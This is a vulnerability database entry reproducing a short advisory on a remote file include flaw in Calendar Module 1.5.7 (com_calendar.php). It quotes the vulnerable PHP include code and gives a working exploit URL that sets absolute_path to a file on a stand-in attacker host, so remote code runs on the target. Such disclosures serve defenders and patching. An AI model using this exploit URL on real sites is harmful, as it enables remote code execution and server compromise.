logo
DATABASE RESOURCES PRICING ABOUT US

Calendar Module <= 1.5.7 Remote File Include Vulnerabilities

Description

--------------------------------------------------------------------------------- Calendar Module <= 1.5.7 Remote File Include Vulnerabilities --------------------------------------------------------------------------------- Author : Matdhule Contact : matdhule@gmail.com Application : Calendar Module (com_calendar.php) Version : 1.5.7 --------------------------------------------------------------------------------- Vulnerability: In folder components we found vulnerability script com_calendar.php. -----------------------com_calendar.php--------------------------------- <?php //Configuration include($absolute_path.'/components/calendar/cal_config.php'); if (!file_exists("language/calendar/".$lang."_calendar.php") ) { die("Invalid Language"); } else { include($absolute_path.'/language/calendar/'.$lang.'_calendar.php'); } ------------------------------------------------------------------------- Variables $absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. --------------------------------------------------------------------------------- Exploit : http://[target]/[path]/components/com_calendar.php?absolute_path=http://attacker.com/evil.txt? --------------------------------------------------------------------------------- Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet